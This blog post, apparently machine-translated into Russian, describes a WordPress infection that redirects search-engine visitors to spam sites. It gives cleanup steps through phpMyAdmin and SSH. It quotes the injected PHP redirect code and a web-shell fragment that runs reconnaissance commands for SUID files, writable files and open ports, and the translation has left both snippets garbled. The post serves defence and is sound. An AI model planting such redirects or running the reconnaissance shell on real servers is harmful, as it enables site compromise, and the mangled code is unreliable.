Блогосфера вирус ... но то, что ты со мной сделал?

В прошлом месяце я получил предупреждение Вирус в блоге от некоторых посетителей. Сначала я проигнорировал предупреждения, потому что я установил довольно хороший антивирус (Kaspersky AV 2009) И даже блога в течение длительного времени, я никогда не получал вирус оповещения (давно .. я видел что-то подозревают, что первое обновление исчезли. Наконец ...).
Медленно начал показывать большие изменения посещаемостиПосле чего в последнее время неуклонно уменьшается трафик и начал все больше и больше людей говорят мне, что stealthsettings.com это virused. Вчера я получил от кого-то скриншот делается, когда их антивирусные скрипт на stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Это было довольно убедительно для меня, так что я положил все источники поиска. Первая мысль, которая пришла мне в голову было сделать модернизация последняя WordPress (2.5.1), но не раньше, чем старый сценарий, чтобы удалить все файлы WordPress и сделать резервное копирование базы данных. Эта процедура была неудачной и, вероятно, не взял бы много времени, чтобы дать мой Сема, где болит, если я бы сказал, В дискуссии за чашкой кофе, он обнаружил, Google и было бы хорошо, чтобы увидеть его.
MyDigitalLife.info, опубликовал статью под названием: "WordPress Hack: Восстановление и исправление Google и поисковой или нет Cookie Трафик перенаправляется на Your-Needs.info, AnyResults.Net, Golden-Info.net и других незаконных сайтов"Это конец нити мне было нужно.
Речь идет о эксплуатировать WordPress на основе печеньяКакой я думаю, что это очень сложная и сделали книгу. Умные достаточно, чтобы сделать SQL-инъекция База данных блога, Для создания невидимых пользователю Простая проверка рутинной Панель приборов->Пользователи, проверить сервер каталогов и файлов "записываемый" (С CHMOD 777), чтобы найти и выполнять Файлы с привилегиями группы или корня. Я не знаю, кто эксплуатирует имя и видим, что есть несколько статей, написанных о нем, несмотря на то, что многие блоги инфицированных, в том числе Румынии. Хорошо ... Я постараюсь, чтобы попытаться объяснить общими о вирусе.

Что такое вирус?

Во-первых, вставить источников страницах блогов, ссылки невидимыми для посетителей, но видимых и индексируемая поисковыми системами, особенно Google. Таким образом Передача Page Rank сайтов указанные злоумышленником. Во-вторых, вводится Перенаправление код URL для посетителей из Google, Live, Yahoo, ... или RSS читателя, а не сайт в печенье, антивирус определяет, как перенаправить Trojan-Clicker.HTML.

Симптомы:

Снижение массовые движения посетителяОсобенно в блогах, где большинство посетителей приходят из Google.

Идентификация: (Таким образом усложнить задачу для тех, кто не знает, как, как PhpMyAdmin, PHP и Linux)

Лос-Анджелес. ВНИМАНИЕ! Сначала сделайте резервную копию базы данных!

1. Проверьте исходные файлы index.php, header.php, footer.php, Темой блога и посмотреть, если есть код, который использует шифрование base64 или содержит "если ($ сер ==" 1 && SizeOf ($ _COOKIE) == 0?) "форме:

<? Php
$ Seref = array ("Google", "MSN", "жить", "Altavista"
"Ask", "Yahoo", "AOL", "CNN", "погода", "Alexa");
$ Ser = 0; Еогеасп ($ Seref как $ ссылка)
если (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ REF) == False) {$ сер = "1;? Break;}!
если ($ сер == "1 && SizeOf ($ _COOKIE) == 0?) {заголовок (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); выход;
}>

Или ... что-то. Удалить этот код!

Кликните на картинку ...

Кодовый индекс

На скриншоте выше я случайно выбрал "<Php get_header ();?>". Этот код должен оставаться.

2. Использовать PHPMYADMIN и перейдите к таблице базы данных wp_usersГде проверить, если нет имени пользователя создается на 00:00:00 0000-00-00 (Возможно в полевых user_login писать "WordPress". Обратите внимание, что идентификатор пользователя (поле ID), а затем удалить его.

Кликните на картинку ...

псевдопользователь

* Зеленая линия должна быть удалена и сохранил свой ID. В случае Был ID = 8 .

3. Перейти к таблице wp_usermeta, Где вы расположенный и вытирать Линии для ID (где поле user_id ID значение удаляется).

4. В Таблице wp_option, К active_plugins и посмотреть, что плагин включен подозреваемого. Он может быть использован как окончаний _old.giff, _old.pngg, _old.jpeg, _new.php.giffИ т.д. расширений комбинации с _old и _new фиктивных изображений.

ГДЕ SELECT * FROM option_name wp_options = 'active_plugins "

Удалить этот плагин, а затем перейти в блог -> Панель управления -> Plugins и активируйте плагин, который отключить определенные.

Нажмите на картинку, чтобы он появляется active_plugins вирусом файл.

плагин

Следуйте по пути на FTP или SSH, указанные в active_plugins и удалить файл с сервера.

5. Кроме того, в PHPMyAdmin, в таблице wp_option, Найти и удалить строку, содержащую "rss_f541b3abd05e7962fcab37737f40fad8"И"internal_links_cache ".
В internal_links_cache, предложил зашифрованные ссылки спама, которые появляются в блог Google Adsense код, Хакер.

6. Рекомендуется изменить пароль Блог и Войти удалить все подозрительные userele. Обновление до последней версии WordPress и установить блог, чтобы не допустить регистрации новых пользователей. Существует никаких потерь ... может прокомментировать и нелогично.

Я пытался объяснить выше, более или менее, что делать в такой ситуации, чтобы очистить вирус блоге. Проблема более серьезная, чем кажется, и далеко не решена, для использования уязвимостей хостинг веб-сервер, который является блог.

В качестве первой меры безопасности, имеющие доступ SSH, Сделать некоторые проверки на сервере, чтобы видеть, есть ли файлы, такие как * _old * и * _new. * С окончаний.Гифф,. JPEG,. pngg,. jpgg. Эти файлы должны быть удалены. Если вы переименовать файл, например. top_right_old.giff in top_right_old.phpМы видим, что файл является именно сервер вредоносный код.

Некоторые полезные признаки проверка, очистка и безопасность сервера. (Через SSH)

1. CD / TMP и проверить, если есть папки, как tmpVFlma или другие комбинации asemenatoare имя и удалите его. Смотрите скриншот ниже, две такие папки на меня:

tmpserver

РМ-РФ имя_папки

2. Проверьте elimiati (изменения CHMOD почта) папок с атрибутами возможности CHMOD 777

Найти все записываемые файлы в текущей директории: Найти. -Type F-Пермь-2-LS
найти все записи каталоги в текущей директории: Найти. -Type D-Пермь-2-LS
найти все записи каталоги и файлы в текущей директории: Найти. -Пермь-2-LS

3. Ищете подозрительных файлов на сервер.

Найти. -Name "* _new.php *"
Найти. -Name "* _old.php *"
Найти. -Name "*. Jpgg"
Найти. -Name "* _giff"
Найти. -Name "* _pngg"

4, ВНИМАНИЕ! файлы, которые были установлены бит SUID si SGID. Эти файлы выполняются с привилегиями пользователя (группу) или корень, а не пользователей, которые запускают файл. Эти файлы могут привести к корневой компромисс, если вопросы безопасности. Если вы не используете SUID и SGID файлы с битом, выполнить 'CHMOD 0 " их или удалить пакет, содержащий их.

Эксплойт содержится где-то в источнике ...:

если (! $ safe_mode) {
если ($ os_type == 'Никс') {
$ Os = Execute ('Sysctl-н kern.ostype').
$ Os = Execute ('Sysctl-н kern.osrelease').
$ Os = Execute ('Sysctl-н kernel.ostype').
$ Os = Execute ('Sysctl-н kernel.osrelease').
если (пусто ($ пользователю)) $ пользователю выполнить = ('ID');
Синонимы $ = Array (
"=>"
"Найти файлы SUID '=>' Найти / типа F-Пермь-04000-LS,
"Найти SGID файлы '=>' Найти / типа F-Пермь-02000-LS,
"Найти все записываемые файлы в текущей директории '=>' найти. -Type F-Пермь-2-LS,
"Найти все записи каталоги в текущей директории '=>' найти. -Type D-Пермь-2-LS,
"Найти все записи каталоги и файлы в текущей директории '=>' найти. -Пермь-2-LS,
"Показывать открытые порты '=>' Netstat-| Grep-я слушаю»,
);
Else {}
. $ Os_name = Execute ('версии');
$ User = Execute («эхо имя пользователя%% ').
Синонимы $ = Array (
"=>"
"Показывать подножка услуги '=>' чистый старт"
"Список Показать процесс '=>' Список задач"
);
}

Находит так ... в основном нарушения безопасности. Порты открыть каталог "записи" и группа исполнения привилегии файлов / корень.

Вернуться с подробнее ...

Некоторые блоги инфицированных: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / блог,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / блог /,

www.mirabilismedia.ro / блог, Blog.einvest.ro
... Этот список можно продолжать ... много.

Вы можете проверить, если блог является вирус, с помощью поисковой системы Google. копия и паста:

Сайт: www.blegoo.com купить

Спокойной ночи и увеличение работать ;) Скоро я приду к Евгению новости prevezibil.imprevizibil.com.

BRB :)

К: ВНИМАНИЕ! WordPress изменение темы или обновления до WordPress 2.5.1, а не решение, чтобы избавиться от этого вируса.

Блогосфера вирус ... но то, что ты со мной сделал?

Об авторе

Хитрость

Страстно обо всем, что означает гаджеты и ИТ, я пишу с удовольствием stealthsettings.com из 2006, и мне нравится открывать вам новые вещи о компьютерах и операционных системах macOS, Linux, Windows, iOS и Android.

Оставить комментарий